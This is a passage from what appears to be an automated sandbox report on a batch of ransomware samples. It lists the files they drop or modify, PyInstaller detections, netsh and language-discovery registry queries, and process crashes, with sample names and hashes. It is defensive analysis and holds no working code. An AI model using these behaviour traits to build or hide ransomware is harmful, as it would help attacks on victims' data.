Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\OrientationControlMiddleCircle.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Configuration\card_expiration_terms_dict.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Viewpoints\Dark\MilitaryRight.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files\MergeGroup.vbe Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons_2x.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\example_icons2x.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files\7-Zip\Lang\vi.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity-dark.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\images\splashscreen.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\security_watermark.jpg Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.ECApp_8wekyb3d8bbwe\Assets\Square150x150Logo.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\debugger\Callstack\images\activeFrameGlyph.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\cache\Desktop\9.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\VisualProfiler\images\i_chartzoom_in_disabled.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Toolkit\Images\dash.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Windows.CBSPreview_cw5n1h2txyewy\Assets\Square150x150Logo.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1266_none_777e4c5802d14c18\AccountLogo.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\header\Images\dockV.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\Web\Wallpaper\Theme2\img9.jpg Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\WinSxS\amd64_microsoft-onecoreua..uetooth-userservice_31bf3856ad364e35_10.0.19041.153_none_e669b22d011fc6b2\DisplaySystemToastIcon.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.ECApp_8wekyb3d8bbwe\Assets\LeftClick.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\debugger\images\cssfileicon.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\Web\Wallpaper\Theme1\img3.jpg Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\darkBlue_GRAD.jpg Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Assets\AccountSmallLogo.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\memoryAnalyzer\images\status_heap_increase.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\VisualProfiler\images\i_f12_chartzoom_in.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\WinSxS\amd64_microsoft-onecoreua..uetooth-userservice_31bf3856ad364e35_10.0.19041.746_none_e6778e5b0114e5b0\MediaSystemToastIcon.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\perftools\images\i_save.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\dom\images\i_just_my_code.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1266_none_777e4c5802d14c18\NetworkProfilesWhite.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\debugger\Breakpoints\images\breakpointDisabled.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\header\Images\badgeBreak.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\ImmersiveControlPanel\images\DefaultPinTile.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\previewTabIcon.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\debugger\images\contentScriptEngineIcon.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-bth-cpl_31bf3856ad364e35_10.0.19041.1_none_0d0ae394ff68d5f5\@BthpropsNotificationLogo.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1266_none_777e4c5802d14c18\ProvisionedCertificatesWhite.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.AsyncTextService_8wekyb3d8bbwe\Assets\StoreLogo.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\common_icons.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\tree_icons.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\cache\Desktop\13.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemResources\Windows.SystemToast.Calling\Images\Placeholder_buddy.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\ASPdotNET_logo.jpg Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\i_next.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\serviceworker\images\serviceworkericon.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1266_none_777e4c5802d14c18\AccountSmallLogo.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\colorPicker\sliderButton.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\dom\images\AddNewRuleIcon.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Windows.CBSPreview_cw5n1h2txyewy\Assets\Wide310x150Logo.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\misc_icons.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\toggleWordWrap.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\debugger\images\functionIcon.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\network\Images\i_clearCookies.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemResources\Windows.UI.ShellCommon\StartUI\Assets\officehub71x71.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-a..extservice.appxmain_31bf3856ad364e35_10.0.19041.1_none_04930b2bd1f9871f\Square150x150Logo.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\DomMutations\images\domDeleteAllBreakpoints.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\colorPicker\checkeredBackground.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\debugger\images\tsfileicon.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\dom\images\BreadcrumbScrollRight.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\Web\Screen\img105.jpg Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\Web\Wallpaper\Theme2\img7.jpg Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\WinSxS\amd64_hyperv-containerlicense_31bf3856ad364e35_10.0.19041.1_none_0b9d42260da91e9d\License.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\dom\images\BreadcrumbScrollRightHover.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\Web\Screen\img104.jpg Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\perftools\images\i_usermark.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\header\Images\NavOverFlow_Start.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\storage\images\clearCookies.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\cache\Desktop\20.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\WinSxS\amd64_microsoft-onecoreua..uetooth-userservice_31bf3856ad364e35_10.0.19041.746_none_e6778e5b0114e5b0\RemoteSystemToastIcon.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\minimize.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\restore.png Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe -
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral1/files/0x0007000000023c90-272.dat pyinstaller behavioral1/files/0x0007000000023d0e-670.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Program crash 7 IoCs
pid pid_target Process procid_target 5796 1136 WerFault.exe 150 7496 5536 WerFault.exe 186 6188 6232 WerFault.exe 195 5672 5276 WerFault.exe 174 5696 5148 WerFault.exe 177 6164 5276 WerFault.exe 174 6908 5148 WerFault.exe 177 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ditziw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AVShieldPro.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language key7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ditziw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hack.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Shade.psr-4d2b8abe7b2d79eb3cd44171a73a645d2d2370d64e51734208b7ef261b8e21ce.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.mvrm-4138c885d1abbe86b0a700b1ff8489932b25c3fb3feaed4bb60f269d80ef22d4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Locky.adiq-a11caa15d682952f356c75249b803496c532ec358094b97e7daee6a17a4210e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.lyiu-985b67a88f7fc9935704c7c18ecb4a7d077fb02c658a9d3fcfec9439776564d5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language key6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VHO-Trojan-Ransom.Win32.Convagent.gen-ceb44492510d44d5bc712a41e1f4da9f5e222647b7a0f9a55db5c8cfcf024f59.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ditziw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language key6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.DoppelPaymer.bf-9d2ef7b5f84ee093e0e010add38917032d45008533472c6744c16c072f266f48.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ditziw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Thanos.gen-68cfd9eeb25aebc7a65c5c72b8426edc88865ec13732374ba5dda877107bfe6a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ditziw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.PornoBlocker.ejtx-724dc1a3bd703a339b5b71136baad19a35f97d1b7c6e94d7fefd4f324dcb5bf3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ditziw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Makop.gen-0ed05e4be5376f0cf391a78afc7a3114ffbfa064348fb66cd93e8ee6f6b27fe1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.KlopRansom.gen-ed3dfa9f2452537d378ead320e1506d392d3f91557d8c52714dfd6024176cf73.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ncarchive.rar.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ditziw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Petr.gen-164a86e099913008bebcd659331c1033c4afd97af2a15cca3a35765bca504be9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 